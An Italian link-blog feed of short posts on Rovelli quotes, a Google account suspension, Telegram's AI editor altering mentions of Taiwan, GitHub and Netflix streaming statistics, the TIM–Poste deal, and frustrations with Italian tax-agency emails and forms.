Mettere in dubbio certezze è la strategia della scienza: scoprire errori in ciò che eravamo convinti di sapere, e correggerli. Anche dove pensavamo di essere certi. La fisica del XX secolo è uno spettacolare successo di questa strategia. Pensavamo che le leggi di Newton fossero esatte o che il tempo trascorresse alla stessa velocità per tutti — ci sbagliavamo. Oggi sappiamo che non è così. Non è grave: abbiamo imparato che le cose stanno altrimenti.

La difficoltà dei problemi scientifici spesso non sta tanto nel trovare idee nuove, quanto nel liberarsi di idee che sembravano ovvie. La scienza è spesso scoprire che cose che credevamo di sapere con certezza sono invece sbagliate.

Quindi trattare certezze come assolute significa ostacolare la possibilità del sapere di progredire. [...] La scienza non si nutre di certezze: si nutre di una radicale incertezza. Costruisce sulla possibilità di mettere in dubbio le certezze.

Carlo Rovelli in Sull'eguaglianza di tutte le cose.

Sad Story Of My Google Workspace account suspension. Quando qualcosa va storto con Google, le storie sono tutte uguali e sembra di parlare con un muro. In questo caso dopo aver fatto delle modifiche alle impostazioni di sicurezza l'account è stato sospeso e i sistemi di recupero non funzionavano o richiedevano un'attesa di 30 giorni (per un'email di lavoro che nel frattempo non può ricevere email).

abtest.design raccoglie i risultati di A/B test reali di applicazioni reali.

La nuove funzioni AI di Telegram basate sulla rete distribuita Cocoon sono evidentemente powered by un LLM cinese (Qwen, immagino):

🇹🇼 The AI text editor's error correction function refuses to work when mentioning the country Taiwan because it corrects it to something like «Taiwan is a state of the PRC».

Dal canale Telegram News and Tips.

La superficie della Terra è molto piccola. Così piccola che per fare il giro la luce ci mette un decimo di secondo: meno di quanto riusciamo a percepire con i sensi. Per questo comunichiamo in maniera che ci sembra istantanea: parliamo per telefono fra New York e Shanghai come fossimo accanto. Non potremmo farlo con un amico che abitasse presso un'altra stella. Per andare e tornare dalla stella più vicina un segnale impiega anni. Una conversazione farebbe morire di noia. La piccolezza della Terra ci dà l'impressione che esista un tempo condiviso. Che abbia sempre senso chiedere cosa succede proprio ora altrove: basta dare un colpo di telefono per saperlo. Non è così nel vasto mondo. L'idea di un tempo comune funziona qui, fra noi, buoni vicini sulla Terra, non funziona con il resto dell'universo.

Carlo Rovelli in Sull'eguaglianza di tutte le cose.

Yup, platform activity is surging. There were 1 billion commits in 2025. Now, it's 275 million per week, on pace for 14 billion this year if growth remains linear (spoiler: it won't.)

GitHub Actions has grown from 500M minutes/week in 2023 to 1B minutes/week in 2025, and now 2.1B minutes so far this week.

Kyle Daigle, COO di GitHub in un tweet.

Netflix ora usa la film grain synthesis abbassando ulteriormente il bitrate AV1, addirittura fino a 200 kbps. In molti casi la qualità migliora (la grana della pellicola se non viene trattata in modo dedicato è difficilmente comprimibile), ma in alcuni la compressione è troppo aggressiva e compare l'effetto banding.

𝗦𝘁𝗿𝗮𝗻𝗴𝗲𝗿 𝗧𝗵𝗶𝗻𝗴𝘀 𝗦𝟱: from 517Kbps to 1493Kbps depending on the episode, with an average of 857Kbps

𝗦𝗮𝗻𝗱𝗺𝗮𝗻 𝗦𝟮: from 367Kbps to 786Kbps depending on the episode, with an average of 533Kbps

𝗕𝗿𝗶𝗱𝗴𝗲𝗿𝘁𝗼𝗻 𝗦𝟰: average 974Kbps

𝗣𝗮𝘀𝘀𝗲𝗻𝗴𝗲𝗿: average 889Kbps

𝗗𝘂𝗻𝗲 𝟮: average 523Kbps

𝗜𝗻𝘁𝗲𝗿𝘀𝘁𝗲𝗹𝗹𝗮𝗿: average 939Kbps

𝗧𝗵𝗲 𝗔𝗿𝗿𝗶𝘃𝗮𝗹: 331Kbps !

And finally

𝗧𝗵𝗲 𝗣𝗹𝗮𝘁𝗳𝗼𝗿𝗺 𝟮: 212Kbps!!!

Netflix ora usa VBR per gli eventi live, cosa che ha richiesto di cambiare la logica di assegnazione del traffico ai server di delivery:

The problem surfaces when the content changes. A fight starts, confetti begins to fall, or the camera cuts to a highly detailed, fast‑moving shot. To preserve quality, VBR may increase the bitrate to 6, 7, or 8 Mbps on the very next segments. If the server has admitted many additional sessions during the preceding low‑bitrate period, the aggregate traffic can suddenly exceed what the network link or NIC can sustain.

[...]

Our fix was to change how we decide whether a server can take more sessions. Instead of basing that decision only on current traffic, we reserve capacity based on each stream’s nominal bitrate, not just what it happens to be using at that moment. Even if a VBR stream is currently in a very cheap, low‑bitrate phase, we still treat it as something that can quickly return to its nominal rate.

Scrive Alfonso Fuggetta che l'acquisto di TIM da parte di Poste Italiane ha poco senso per tre motivi:

• Il "controllo delle infrastrutture strategiche" non c'è, visto che la rete fissa, così come Sparkle, cioè le vere "infrastrutture strategiche", sono già state date via (tra l'altro con modi e benefici discutibili).
• Le "sinergie industriali", cioè in questo caso integrare i servizi TIM e Poste, funzionano raramente.
• L'unica motivazione di cui ammette validità è la più onesta "messa in sicurezza di un operatore con problemi strutturali irrisolti", cioè usare Poste come contenitore pubblico per gestire una situazione che "il mercato non ha saputo o voluto risolvere" e guadagnare tempo. TIM è ancora inefficiente e ad andare bene sono solo le sue attività laterali come TIM Brasil e TIM Enterprise, che nulla c'entrano con Poste.

In pratica, un'operazione di "ingegneria finanziaria" contornata come avviene molto frequentemente nel settore da una totale assenza di visione industriale:

Sul piano finanziario, ridurre il costo del debito di TIM attraverso la solidità di Poste non è una sinergia industriale: è ingegneria finanziaria. Non si crea valore, si sposta il rischio sul bilancio dello Stato.

Sul piano industriale, non si chiarisce il ruolo della rete, non si semplifica la struttura, non si definisce un modello operativo credibile per un business che è diventato infrastrutturale e a margini compressi. E si sottrae l'unico pezzo che cresce — il cloud enterprise — a un contesto in cui avrebbe bisogno di agilità, non di ulteriore complessità.

Sul piano del mercato, si continua a ignorare che le telecomunicazioni — dopo il passaggio a pacchetto — richiedono modelli radicalmente più snelli e focalizzati, non conglomerati ancora più pesanti e opachi.

Il gruppo che emergerà da questa operazione sarà probabilmente troppo grande per fallire e troppo ibrido per competere. Non è una visione industriale. È un’operazione di salvataggio travestita da strategia — o, se si preferisce, una nazionalizzazione che non osa dirsi tale.

Sto tornando a casa. Blanco che fa 43km a piedi in live streaming.

L'email di conferma F24 dell'Agenzia delle Entrate arriva da infrastruttura Sogei ma per qualche motivo il mittente noreply.telematico@agenziaentrate.it è nella Hash Blocklist (HBL) di Spamhaus, che è autorevole e quindi gli score di spam vanno alle stelle e l'email finisce in spam con i provider che usano questa blocklist come segnale (cioè la maggior parte).

E sì, l'oggetto inizia con "oggetto:".

Poi un giorno bisognerà capire in che modo l'Agenzia delle Entrate è arrivata a concepire il quadro RS della dichiarazione dei redditi. Non serve a niente, è solo monitoraggio, di cose che già sanno, e ha regole assurde:

Indicazione dei dati per la compilazione del quadro RS per chi è in Regime Forfettario

Solo per contribuenti in Regime Forfettario che vogliono comunicare al fisco eventuali fatture di acquisto ricevute e intestate alla loro partita iva.

Se sei un professionista scrivi gli importi totali delle fatture che hai ricevuto indicando, accanto agli importi, i servizi a cui si riferiscono; vanno indicate solo eventuali fatture per «servizi telefonici», “consumi di energia elettrica”, “carburanti per autoveicoli» (non altre tipologie di spesa);

Se sei un commerciante/artigiano scrivi gli importi totali delle fatture che hai ricevuto indicando, accanto agli importi, i servizi a cui si riferiscono; vanno indicate solo eventuali fatture per «acquisto merci da rivendere», «affitti passivi pagati o leasing», “carburanti per autoveicoli» (non altre tipologie di spesa);

Provo a pagare in F24 web e:

Mi metti in automatico una data del 2024 e poi ti lamenti che è nel passato.

Tra l'altro, "od uguale".

EDIT:

Saranno gli spazi? Non sono gli spazi, non vanno nemmeno i trattini.

Ah ci voleva l'underscore. Ora in rosso bold mi dice che è tutto ok: